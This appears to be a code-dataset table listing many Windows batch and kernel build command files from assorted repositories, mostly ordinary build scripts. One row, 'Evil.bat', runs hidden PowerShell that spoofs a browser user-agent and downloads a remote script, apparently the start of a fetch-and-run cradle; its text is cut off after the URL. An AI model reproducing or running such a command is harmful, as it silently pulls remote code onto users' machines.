code stringlengths 3 1.03M | repo_name stringlengths 5 84 | path stringlengths 4 233 | language stringclasses 1
value | license stringclasses 15
values | size int32 3 1.03M |
|---|---|---|---|---|---|
cmd_sound/core/built-in.o := /opt/toolchains/arm-2009q3/bin/arm-none-eabi-ld -EL -r -o sound/core/built-in.o sound/core/snd.o sound/core/snd-timer.o sound/core/snd-pcm.o sound/core/snd-page-alloc.o
| dizgustipated/BOCA-2.6.35.14 | sound/core/.built-in.o.cmd | bat | gpl-2.0 | 203 |
cmd_net/ipv4/netfilter/iptable_nat.o := /home/ian/kernel/toolchain/prebuilt/arm-eabi-4.4.3/bin/arm-eabi-ld -EL -r -o net/ipv4/netfilter/iptable_nat.o net/ipv4/netfilter/nf_nat_rule.o net/ipv4/netfilter/nf_nat_standalone.o
| sleshepic/epic_touch_kernel | net/ipv4/netfilter/.iptable_nat.o.cmd | bat | gpl-2.0 | 226 |
@echo off
set java_path="C:\Program Files\Java\jre7\bin\java.exe"
if not exist %java_path% set java_path="C:\Program Files (x86)\Java\jre7\bin\java.exe"
if not exist %java_path% set java_path="C:\Programmes\Java\jre7\bin\java.exe" goto error_java
set jdk_path="C:\Program Files\Java\jdk1.7.0_45\bin\javac.exe"
if not ... | Charles-M/CompilateurPlic | src/compilplic/analyse/compil_grammaire.bat | bat | gpl-2.0 | 1,418 |
cmd_kernel/timer.o := arm-none-linux-gnueabi-gcc -Wp,-MD,kernel/.timer.o.d -nostdinc -isystem /opt/CodeSourcery/bin/../lib/gcc/arm-none-linux-gnueabi/4.3.3/include -I/home/maximilian/projects/git-clean/ev3sources/extra/linux-03.20.00.13/arch/arm/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -ml... | EAVR/EV3.14 | ev3sources/extra/linux-03.20.00.13/kernel/.timer.o.cmd | bat | gpl-2.0 | 28,042 |
mkdir build
cd build
set BOOST_ROOT=%PREFIX%
cmake -LAH -G"Visual Studio 15 2017 Win64" ^
-DWALBERLA_BUILD_WITH_PYTHON=ON ^
-DWALBERLA_BUILD_WITH_MPI=OFF ^
-DWALBERLA_BUILD_WITH_OPENMP=ON ^
-DPYTHON_EXECUTABLE=... | lssfau/walberla | utilities/conda/walberla/bld.bat | bat | gpl-3.0 | 443 |
@echo off
servusb -e 127
timeout 1
servusb -d
| zwostein/PointIR | etc.windows/pointir_calibrationBeginHook.bat | bat | gpl-3.0 | 50 |
/**/
"@ECHO OFF"
"mode co80,102"
"copy ..\..\resdll\*.rc"
"copy ..\..\resdll\*.dlg"
"copy captions text.h"
"pause"
call mkresdll2 "STLRES13", "pref.rc", "@#AlessandroCantatore:1.3#@Styler/2 Russian resources V.1.3 - (c) 1998-2003 Alessandro Cantatore", "-DSTLRRESDLL -i ..\..\headers -i ..\..\pref"
"pause"
"del *.rc"
"d... | OS2World/UTIL-WPS-Styler_2 | nls/Russo/buildres.cmd | bat | gpl-3.0 | 464 |
@echo off
:: Init Script for cmd.exe
:: Created as part of cmder project
:: !!! THIS FILE IS OVERWRITTEN WHEN CMDER IS UPDATED
:: !!! Use "%CMDER_ROOT%\config\user-profile.cmd" to add your own startup commands
:: Set to > 0 for verbose output to aid in debugging.
if not defined verbose-output ( set verbose-output=0 ... | adamjoniec/cmdline | cmder/vendor/init.bat | bat | gpl-3.0 | 6,519 |
@ECHO OFF
IF NOT "%~f0" == "~f0" GOTO :WinNT
@"F:\atomicApe\babun\cygwin\home\bananas\Ruby22\bin\ruby.exe" "F:/atomicApe/babun/cygwin/home/bananas/Ruby22/bin/sass" %1 %2 %3 %4 %5 %6 %7 %8 %9
GOTO :EOF
:WinNT
@"F:\atomicApe\babun\cygwin\home\bananas\Ruby22\bin\ruby.exe" "%~dpn0" %*
| justathoughtor2/atomicApe | cygwin/bin/sass.bat | bat | gpl-3.0 | 282 |
::
:: media-tools
:: Copyright (C) 2019-2021 Olivier Korach
:: mailto:olivier.korach AT gmail DOT com
::
:: This program is free software; you can redistribute it and/or
:: modify it under the terms of the GNU Lesser General Public
:: License as published by the Free Software Foundation; either
:: version 3 of the Lice... | okorach/audio-video-tools | batch-files/1080p sliced.bat | bat | lgpl-3.0 | 1,001 |
@IF EXIST "%~dp0\node.exe" (
"%~dp0\node.exe" "%~dp0\..\grunt-preprocess\bin\grunt-preprocess" %*
) ELSE (
@SETLOCAL
@SET PATHEXT=%PATHEXT:;.JS;=;%
node "%~dp0\..\grunt-preprocess\bin\grunt-preprocess" %*
) | Andrii-Ivashkevych/CV | node_modules/.bin/grunt-preprocess.cmd | bat | apache-2.0 | 222 |
@echo off
set PYTHONHOME=C:\Python27
set PATH=%PATH%;C:\Python27;C:\Python27\Scripts
| iwxfer/pycrap | pyconf.cmd | bat | apache-2.0 | 85 |
@echo off
if "%~1"=="" (call :usage) else call :%*
exit /b
:usage -- Library syntax and general info
::
:: CharLib.bat is a callable library of batch functions used to interconvert
:: between characters and numeric ASCII code values.
::
:: syntax:
::
:: [call] [path]CharL... | soiff/scripts | batch/charlib.bat | bat | apache-2.0 | 27,773 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18N... | rackerlabs/metricslogging | docs/make.bat | bat | apache-2.0 | 6,475 |
REM install db
call C:\funda_components\reports_manager\report_manager_database\reports_manager_test_db\install_reports_manager_test_db.bat
"C:\Program Files\PostgreSQL\9.6\bin\psql.exe" -h localhost -U postgres -d reports_manager_test_db -p 5432 -f ..\action_enter_edit_report_parameters.sql 1> test_action_enter_edi... | james-cantrill/funda_components | reports_manager/report_manager_database/action_functions/test/test_action_enter_edit_reports.bat | bat | apache-2.0 | 1,827 |
dir %*
| greenlaw110/winenv | bin/ls.bat | bat | bsd-2-clause | 7 |
@if {%1} == {prototype} goto CheckParam2
@if {%1} == {hana} goto CheckParam2
@if {%1} == {vs2005} goto CheckParam2
@echo please specify doc style, it should be either prototype/vs2005/hana
goto End
:CheckParam2
@if {%2} == {} (
@echo please specify assembly name
goto End
)
:CheckParam3
@if {%3} == {} (
... | jozefizso/sandcastle-presentation | Sandcastle/Examples/Sandcastle/build_Sandcastle.bat | bat | bsd-3-clause | 4,162 |
@echo on
rmdir /S /Q .\Install
for /d %%x in (objfre_*) do rmdir /S /Q %%x
for /d %%x in (objchk_*) do rmdir /S /Q %%x
rmdir /S /Q .\sdv
rmdir /S /Q .\sdv.temp
del /F *.log *.wrn *.err
del vioscsi.dvl.xml
del vioscsi.dvl-compat.xml
del sdv-map.h
| daynix/kvm-guest-drivers-windows | vioscsi/clean.bat | bat | bsd-3-clause | 249 |
@REM Delete so if builder fails it wont exist
del source2\Build\Cosmos.Build.Builder\bin\Debug\Cosmos.Build.Builder.*
%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe "source2\Builder.sln" /nologo /maxcpucount /p:Configuration=Debug /p:Platform=x86
@if not exist source2\Build\Cosmos.Build.Builder\bin\Debu... | Coder-666/COSMOS | install.bat | bat | bsd-3-clause | 721 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_OXORULE.S04_ProcessRulesOnPublicFolder.MSOXORULE_S04_TC03_ServerExecuteRule_Action_OP_TAG_OnPublicFolder /testcontainer:..\..\MS-OXORULE\TestSuite\bin\Debug\MS-OXORULE_TestSuite.dll /runconfig:..\..\MS-OXORULE\MS-OXORULE.tests... | XinwLi/Interop-TestSuites-1 | ExchangeMAPI/Source/Scripts/MS-OXORULE/RunMSOXORULE_S04_TC03_ServerExecuteRule_Action_OP_TAG_OnPublicFolder.cmd | bat | mit | 341 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_WSSREST.S01_ManageListItem.MSWSSREST_S01_TC13_RetrieveListItemsThatSatisfySpecifiedCriteria /testcontainer:..\..\MS-WSSREST\TestSuite\bin\Debug\MS-WSSREST_TestSuite.dll /runconfig:..\..\MS-WSSREST\MS-WSSREST.testsettings /uniq... | OfficeDev/Interop-TestSuites | SharePoint/Source/Scripts/MS-WSSREST/RunMSWSSREST_S01_TC13_RetrieveListItemsThatSatisfySpecifiedCriteria.cmd | bat | mit | 328 |
@echo off
title VSCode Dev
set NODE_ENV=development
set VSCODE_DEV=1
set ELECTRON_ENABLE_LOGGING=1
set ELECTRON_ENABLE_STACK_DUMPING=1
pushd %~dp0\..
node .\node_modules\gulp\bin\gulp.js electron
..\Electron-Build\CodeOSS.exe . %*
popd
| i-csharp/vscode | scripts/code.bat | bat | mit | 250 |
cmd_net/sunrpc/svcauth_unix.o := /opt/buildroot-gcc342/bin/mipsel-linux-uclibc-gcc -Wp,-MD,net/sunrpc/.svcauth_unix.o.d -nostdinc -isystem /root/asuswrt-bender/tools/brcm/K26/hndtools-mipsel-uclibc-4.2.4/bin/../lib/gcc/mipsel-linux-uclibc/4.2.4/include -D__KERNEL__ -Iinclude -include include/linux/autoconf.h -Wall -W... | matteocrippa/dsl-n55u-bender | release/src-ra/linux/linux-2.6.21.x/net/sunrpc/.svcauth_unix.o.cmd | bat | gpl-2.0 | 20,242 |
@echo off
title EasyJF
color a
rem by WilliamRaym 16:46 2006-6-15
rem by WilliamRaym 15:18 2007-8-6
rem by WilliamRaym 13:13 2007-12-19
if "%OS%"=="Windows_NT" SETLOCAL
:main
@rem copy the easyjweb jars to the target dir
@copy "..\..\lib\easyjweb-core-*.jar" "src\main\webapp\WEB-INF\lib\" >nul 2>nul
@copy "..... | youjava/easyjweb | samples/hello/init.bat | bat | apache-2.0 | 573 |
@echo off
rem ------------------------------------------------------------
rem This batch runs all FMUs of the FmuSDK and stores simulation
rem results in CSV files, one file per simulation run.
rem Command to run the 32 bit version: run_all
rem Command to run the 64 bit version: run_all -win64
rem Copyright Q... | cxbrooks/fmusdk2 | run_all.bat | bat | bsd-2-clause | 4,429 |
call "%ProgramFiles%\Microsoft Visual Studio 10.0\Common7\Tools\vsvars32.bat"
IF ERRORLEVEL 1 GOTO TRYX86
GOTO BUILD
:TRYX86
call "%ProgramFiles(x86)%\Microsoft Visual Studio 10.0\Common7\Tools\vsvars32.bat"
IF ERRORLEVEL 1 GOTO NEEDSVS
:BUILD
cd csharp
devenv Volante.sln /Project tests\Tests\Tests.csproj /... | kjk/volante-obsolete | scripts/runtestslong.bat | bat | mit | 561 |
robocopy "C:\World of Warcraft\Cache\ADB\enUS" "C:\Simulationcraft\dbc_extract\cache\live" item.adb itembonus.adb itembonustreenode.adb itemeffect.adb itemxbonustree.adb spellclassoptions.adb spellpower.adb spellrunecost.adb item-sparse.adb spellmisc.adb
pause | eyeplum/simc | dbc_extract/cache/live/ADBFiles.bat | bat | gpl-3.0 | 260 |
wmakel -u -n -h %1 %2 %3 %4 %5 %6 %7 %8 %9 >_wm_temp.bat
_wm_temp.bat
| JianpingZeng/xcc | xcc/test/mediabench4/ghostscript/src/wmakebat.bat | bat | bsd-3-clause | 70 |
@echo off
call set-env.cmd
:: change working directory
cd %CODEBASE%
cmd /k | seu-as-code/seu-as-code.packages | de.qaware.seu.as.code/seuac-environment/current/files/default/start-console.bat | bat | apache-2.0 | 77 |
del hcngui.bin
process -i hcngui.dll -o hcngui.bin
append -s hcngui.bin -a ASC16 -b 20000
append -s hcngui.bin -a HZK16 -b 30000
| hellox-project/HelloX_GUI | guimaker/guimaker.bat | bat | mit | 129 |
@RD /S /Q "build"
@RD /S /Q "bin"
@RD /S /Q "solutions" | alapontgr/Engine | CleanFiles.bat | bat | mit | 55 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == ... | tetra5/gooby | docs/make.bat | bat | mit | 4,521 |
del build\*.* /s /f /q
rmdir build\*.* /s /f /q
rmdir build\ /s /q
mkdir build
c:\Python34\Python.exe setup.py build
cd build
rename exe.win-amd64-3.4 AMOS-Demo(Win64)
cd "AMOS-Demo(Win64)"
del openvr_api.dll
del openvr_plugin.dll
cd..
"C:\Program Files\7-Zip\7z.exe" a AMOS-Demo(Win64).zip
pause | astrofra/amiga-experiments | amos-demo-python-remake/src/build.bat | bat | mit | 316 |
@echo off
setlocal
if %IMPL_MODE%0 NEQ 0 goto IMPL
call "%%~dp0__init__\__init__.bat" || exit /b
call "%%CONTOOLS_PROJECT_ROOT%%/__init__/declare_builtins.bat" %%0 %%*
for %%i in (CONTOOLS_ROOT CONTOOLS_UTILITIES_BIN_ROOT) do (
if not defined %%i (
echo.%~nx0: error: `%%i` variable is not defined... | andry81/contools | Scripts/Tools/ToolAdaptors/app/amule/backup_downloads.bat | bat | mit | 4,084 |
@echo off
for /f "delims=" %%i in ("%cd%") do set folder=%%~ni
cd ..
electron %folder%
| xiashuangxi/FDSpaceBag | startup.bat | bat | mit | 87 |
@ECHO OFF
SET FILENAME=x265vfw.inf
TITLE x265vfw - H.265/MPEG-H codec
ECHO Installing...
REM Workaround for the lost current dir while using "Run as Administrator"
SETLOCAL ENABLEEXTENSIONS
IF EXIST "%~dp0" cd /D "%~dp0"
IF NOT EXIST %FILENAME% GOTO FILE_MISSING
IF "%PROCESSOR_ARCHITECTURE%"=="" GOTO INSTALL_X86
IF ... | shinji3/x265vfw | x265vfw/x265vfw.bat | bat | gpl-2.0 | 653 |
deps_config := \
lib/xz/Kconfig \
lib/Kconfig \
arch/arm64/crypto/Kconfig \
crypto/asymmetric_keys/Kconfig \
drivers/crypto/dx_ccp/Kconfig \
drivers/crypto/ux500/Kconfig \
drivers/crypto/nx/Kconfig \
drivers/crypto/caam/Kconfig \
drivers/crypto/Kconfig \
crypto/async_tx/Kconfig \
crypto/Kconfig \
security/i... | slade87/ALE21-Kernel | include/config/auto.conf.cmd | bat | gpl-2.0 | 31,545 |
cmd_/home/yutingkao23/linuxcnc-add-hal-ethercat/src/at_pid.ko := ld -r -m elf_i386 -T /usr/src/linux-headers-2.6.32-122-rtai/scripts/module-common.lds --build-id -o /home/yutingkao23/linuxcnc-add-hal-ethercat/src/at_pid.ko /home/yutingkao23/linuxcnc-add-hal-ethercat/src/at_pid.o /home/yutingkao23/linuxcnc-add-hal-ether... | CalvinHsu1223/LinuxCNC-EtherCAT-HAL-Driver | src/.at_pid.ko.cmd | bat | gpl-2.0 | 341 |
cmd_mm/maccess.o := arm-none-linux-gnueabi-gcc -Wp,-MD,mm/.maccess.o.d -nostdinc -isystem /opt/CodeSourcery/bin/../lib/gcc/arm-none-linux-gnueabi/4.3.3/include -I/home/maximilian/projects/git-clean/ev3sources/extra/linux-03.20.00.13/arch/arm/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittl... | EAVR/EV3.14 | ev3sources/extra/linux-03.20.00.13/mm/.maccess.o.cmd | bat | gpl-2.0 | 19,428 |
cmd_drivers/video/samsung/built-in.o := /usr/local/arm/arm-eabi-4.4.3/bin/arm-eabi-ld -EL -r -o drivers/video/samsung/built-in.o drivers/video/samsung/s3cfb.o drivers/video/samsung/s3cfb_fimd6x.o drivers/video/samsung/s3cfb_s6c1372.o drivers/video/samsung/s3cfb_mdnie.o drivers/video/samsung/s3cfb_ielcd.o drivers/vi... | miamo/miamOv | drivers/video/samsung/.built-in.o.cmd | bat | gpl-2.0 | 379 |
cmd_net/ipv6/proc.o := gcc -Wp,-MD,net/ipv6/.proc.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/4.8/include -D__KERNEL__ -Iinclude -include include/linux/autoconf.h -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Os -Wframe-larger-than=20... | namgk/kernel-tut | net/ipv6/.proc.o.cmd | bat | gpl-2.0 | 25,016 |
cmd_drivers/idle/built-in.o := rm -f drivers/idle/built-in.o; /home/radug/Android/cm/system/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi-ar rcs drivers/idle/built-in.o
| RaduG/2.6.29-RaKern-2x-Hero | drivers/idle/.built-in.o.cmd | bat | gpl-2.0 | 181 |
cmd_drivers/media/common/built-in.o := /opt/arm-2008q1/bin/arm-none-linux-gnueabi-ld -EL -r -o drivers/media/common/built-in.o drivers/media/common/tuners/built-in.o
| yohanes/Acer-BeTouch-E130-Linux-Kernel | drivers/media/common/.built-in.o.cmd | bat | gpl-2.0 | 171 |
cmd_arch/x86/boot/cpucheck.o := gcc -Wp,-MD,arch/x86/boot/.cpucheck.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.4.7/include -I/home/madhwang/Development/linuxSource/linux-2.6.34.7/arch/x86/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -I/home/madhwang/Development/linuxSource/linux-2.6.... | madhwang/linuxKernel | arch/x86/boot/.cpucheck.o.cmd | bat | gpl-2.0 | 5,833 |
cmd_drivers/media/built-in.o := /home/lithium/CodeSourcery/Sourcery_G++_Lite/bin/arm-none-linux-gnueabi-ld -EL -r -o drivers/media/built-in.o drivers/media/common/built-in.o drivers/media/rc/built-in.o drivers/media/video/built-in.o drivers/media/radio/built-in.o
| 0xD34D/kernel_amazon_tate | drivers/media/.built-in.o.cmd | bat | gpl-2.0 | 269 |
cmd_loginutils/adduser.o := arm-linux-musleabihf-gcc -Wp,-MD,loginutils/.adduser.o.d -std=gnu99 -Iinclude -Ilibbb -include include/autoconf.h -D_GNU_SOURCE -DNDEBUG -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -D"BB_VER=KBUILD_STR(1.22.1)" -DBB_BT=AUTOCONF_TIMESTAMP -Wall -Wshadow -Wwrite-string... | ThinkIntegrate/busybox | loginutils/.adduser.o.cmd | bat | gpl-2.0 | 11,658 |
cmd_arch/arm/lib/sha1.o := /space/android/system/prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin/arm-eabi-gcc -Wp,-MD,arch/arm/lib/.sha1.o.d -nostdinc -isystem /space/android/system/prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin/../lib/gcc/arm-eabi/4.4.3/include -I/space/android/kernel/linux-2.6.39-tegra/arch/arm/inc... | asopov/linux-tpt-2.6.39 | arch/arm/lib/.sha1.o.cmd | bat | gpl-2.0 | 1,392 |
cmd_arch/powerpc/kernel/setup-common.o := ppc_4xx-gcc -m32 -Wp,-MD,arch/powerpc/kernel/.setup-common.o.d -nostdinc -isystem /tools/dev/eldk/usr/bin/../lib/gcc/powerpc-linux/4.2.2/include -I/tools/dev/repos/linux-2.6-xlnx/arch/powerpc/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -Iarch/powerpc ... | mattkelly/linux-2.6-xlnx | arch/powerpc/kernel/.setup-common.o.cmd | bat | gpl-2.0 | 29,917 |
@echo off
cls
Title Building MediaPortal Spectrum Analyzer (RELEASE)
cd ..
if "%programfiles(x86)%XXX"=="XXX" goto 32BIT
:: 64-bit
set PROGS=%programfiles(x86)%
goto CONT
:32BIT
set PROGS=%ProgramFiles%
:CONT
IF NOT EXIST "%PROGS%\Team MediaPortal\MediaPortal\" SET PROGS=C:
setlocal enabledelayedexpansion
:: Pre... | andrewjswan/mediaportal.spectrum.analyzer | scripts/Build_GIT.bat | bat | gpl-2.0 | 826 |
@REM This batch file has been generated by the IAR Embedded Workbench
@REM C-SPY Debugger, as an aid to preparing a command line for running
@REM the cspybat command line utility using the appropriate settings.
@REM
@REM Note that this file is generated every time a new debug session
@REM is initialized, so you may wan... | LeLLIuj/wgtime | EWARM/settings/wgtime.Debug.cspy.bat | bat | gpl-3.0 | 1,523 |
rem call %~dp0\set_path_variables
call %~dp0\generate_physical_model >%LOGS%\ERmodelERmodel.logical2physical.log 2>&1 & type %LOGS%\ERmodelERmodel.logical2physical.log | findstr "[Ee]rror"
echo ************************************************** >>%LOGS%\build.log
echo ** generate physical model from ERmodelER... | JohnWCartmell/ERmodelSeries1 | buildscripts/generate_physical_modelandlog.bat | bat | gpl-3.0 | 517 |
@echo off
Powershell -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $Web = New-Object Net.WebClient;$Web.Headers.Add('user-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36)');$Command = $Web.DownloadString('https://raw.githubusercontent.com/... | UnholyDawns/ShellCode | Evil.bat | bat | gpl-3.0 | 375 |
@IF EXIST "%~dp0\node.exe" (
"%~dp0\node.exe" "%~dp0\..\gulp-uglify\node_modules\uglify-js\bin\uglifyjs" %*
) ELSE (
@SETLOCAL
@SET PATHEXT=%PATHEXT:;.JS;=;%
node "%~dp0\..\gulp-uglify\node_modules\uglify-js\bin\uglifyjs" %*
) | kethxenn/C.B.U.L.M.S. | node_modules/.bin/uglifyjs.cmd | bat | gpl-3.0 | 236 |
@echo off
color 0a
:SCROLLR
echo 1101010100010010100000100010101100101010101000000000000110000000000000000000000000011000111110000000000000000000
echo 1101010100010010100000100010101100101010101000000000000110000000000000000000000000011000111110000000000000000000
echo 11010101000100101000001000101011001010101010... | JonnyBanana/BatchMan-Robby | launch.bat | bat | gpl-3.0 | 11,828 |
copy /Y *.txt C:\input\peazip-5.2.0.src\
copy /Y #times C:\input\peazip-5.2.0.src\
copy /Y comp_speed C:\input\peazip-5.2.0.src\
copy /Y history C:\input\peazip-5.2.0.src\
copy /Y manifest C:\input\peazip-5.2.0.src\
copy /Y readme C:\input\peazip-5.2.0.src\
copy /Y *.aes C:\input\peazip-5.2.0.src\
copy /Y *.asm ... | Arucard1983/PeaZip-for-ARM | src.bat | bat | lgpl-3.0 | 1,566 |
@echo off
setLocal
set left=%1
set right=%2
if [%3]==[] (
set leftlogrev=-r %1
set leftdiffrev=-c %1
) else (
set leftlogrev=%3
set leftdiffrev=%3
)
if [%4]==[] (
set rightlogrev=-r %2
set rightdiffrev=-c %2
) else (
set rightlogrev=%4
set rightdiffrev=%4
)
set prefix=p... | guerreroderrick/batch-utils | patchesMerged.bat | bat | unlicense | 1,090 |
copy C:\workspace\projects\SuinovaComics\client\suireader\bin\suireader.swf C:\workspace\projects\SuinovaComics\src\js
| tedwen/suicomics-flash | suiquest/cp.bat | bat | apache-2.0 | 119 |
set CMAKE_URL=http://www.cmake.org/files/v3.2/cmake-3.2.1-win32-x86.zip
cd "%~dp0"
if not exist cmake.zip bin\curl -L %CMAKE_URL% > cmake.zip
bin\7z x -r -y -o. cmake.zip
set cmakedir="empty"
for /D %%A IN ("cmake-3*") DO set cmakedir=%%A
move %cmakedir% bin\cmake
del cmake.zip
| wtrsltnk/gamedev-deps | download-extract-cmake.bat | bat | apache-2.0 | 286 |
go build main.go
main | xulei8/lifeapp | make.bat | bat | apache-2.0 | 26 |
cd C:\Users\kasibhov\Desktop\Hygieia\Hygieia-Devops-Dashboard\collectors\build\sonar\target
java -jar sonar-codequality-collector-2.0.4-SNAPSHOT.jar | harish961/Hygieia-WFN | Bat files/sonar.bat | bat | apache-2.0 | 148 |
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::
:: Bake is a shell script for running CakePHP bake script
:: PHP 5
::
:: CakePHP(tm) : Rapid Development Framework (http://cakephp.org)
:: Copyright 2005-2012, Cake Software Foundation, Inc.
::
:: Licensed under The MIT License
... | vinhle91/elearning | lib/Cake/Console/cake.bat | bat | apache-2.0 | 974 |
:: Initial Setup
:: set user = "roswell@tomwallis.onmicrosoft.com"
:: set password = "Passw0rd"
:: Configure the signatures of all of the users with details collected in the Initial Setup.
PowerShell.exe -File updateUser.ps1
:: Exit
pause | probablytom/sigConfig | configureMail.bat | bat | artistic-2.0 | 242 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18N... | hotsyk/pythonrequpdater | docs/make.bat | bat | bsd-3-clause | 6,479 |
cmd_crypto/crypto_blkcipher.o := arm-none-linux-gnueabi-ld -EL -r -o crypto/crypto_blkcipher.o crypto/ablkcipher.o crypto/blkcipher.o
| EAVR/EV3.14 | ev3sources/extra/linux-03.20.00.13/crypto/.crypto_blkcipher.o.cmd | bat | gpl-2.0 | 138 |
rem
echo zwei
set PATH=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Program Files\TortoiseSVN\bin;C:\Program Files\GnuWin32\bin;E:\Programme\Git\cmd;E:\Programme\Git\bin;E:\Programme\git\bin;E:\Programme\Ruby193\bin
ruby -v
call bundle install --without debugger ... | ngiger/oddb.org | run_ie_watir_tests.cmd | bat | gpl-3.0 | 375 |
@ECHO OFF
"@php-bin@" "@php-dir@\PHP\ParserGenerator\cli.php" %1 %2 %3 %4 %5 %6 %7 | KendallHopkins/ParserGenerator | phplemon.bat | bat | bsd-3-clause | 82 |
cmd_drivers/thermal/built-in.o := arm-eabi-ld -EL -r -o drivers/thermal/built-in.o drivers/thermal/thermal_sys.o drivers/thermal/pmic8901-tm.o drivers/thermal/msm8x60_tsens.o drivers/thermal/msm_thermal.o
| R-M-S/RMS_DragunKernel_V.11-MAX-9-3-2012_3.0.42 | drivers/thermal/.built-in.o.cmd | bat | gpl-2.0 | 210 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
... | alexvmarch/exa | docs/make.bat | bat | apache-2.0 | 6,984 |
python official.py
pause | petejan/imos-toolbox | snapshot/official.bat | bat | gpl-3.0 | 25 |
..\..\bin\mfusg.exe ex3B.nam
pause
| bdestombe/flopy-1 | examples/data/mfusg_test/03B_conduit_unconfined/run.bat | bat | bsd-3-clause | 37 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set... | percyfal/bokeh | sphinx/make.bat | bat | bsd-3-clause | 1,207 |
copy /y c:\boost\modular\develop\libs\filesystem\doc\*.htm? C:\boost\filesystem-gh-pages
pushd C:\boost\filesystem-gh-pages
git commit -a -m "merge from develop"
git push
popd
rem Copyright Beman Dawes, 2015
rem Distributed under the Boost Software License, Version 1.0.
rem See www.boost.org/LICENSE_1_0.txt | lucadelu/PDAL | vendor/pdalboost/libs/filesystem/tools/publish.bat | bat | bsd-3-clause | 308 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18N... | PythonicNinja/pydrill | docs/make.bat | bat | mit | 6,461 |
@ECHO off
SETLOCAL
REM Batch script to delete Intel AMT Service and remove the LMS.exe executable from
REM C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS
REM Author: @dipstar
REM Date: Thursday 04th May, 2017
REM Version: 1.0
REM Variables
SET EXECUTABLE_LOCATION="%ProgramFiles(x86)%\Intel\Int... | dipstar/scripts | batch/DisableDeleteIntelAMTService/DisableDeleteAMTService.cmd | bat | mit | 733 |
@echo "start test clients ..."
asio_echo_client.exe --host=127.0.0.1 --port=8090 --mode=echo --test=qps --packet-size=64 --thread-num=1
pause
| shines77/netlib_test | bin/vc2015/x64-Release/start_one_local_client.bat | bat | mit | 142 |
"C:\Program Files (x86)\MATLAB\R2013a\sys\lcc\bin\lccmake.exe" -f modelo_final_sfun.lmk
| jhonantans/TG | Jhon/SimFuzzy_v3/slprj/_sfprj/modelo_final/_self/sfun/src/modelo_final_sfun.bat | bat | mit | 88 |
java -jar jetty-runner.jar context.xml | jyucsiro/sissvoc-runner | sissvoc-run.bat | bat | mit | 38 |
@echo off
cls
cd %~dp0
".\packages\FAKE\tools\Fake.exe" "build.fsx" %1
| kolupaev/Fake.AWS | Fake.AWS/build.bat | bat | mit | 71 |
@ECHO OFF
REM Set variables
SET SOURCE=%~dp0
SET SOURCE=%SOURCE:~0,-1%
IF NOT DEFINED LOGDIR SET LOGDIR=%SystemRoot%\TEMP
REM Resources
REM http://support.citrix.com/proddocs/topic/xendesktop-7/cds-install-command.html
REM VDA,PLUGINS
SET OPTIONS=
SET OPTIONS=/QUIET
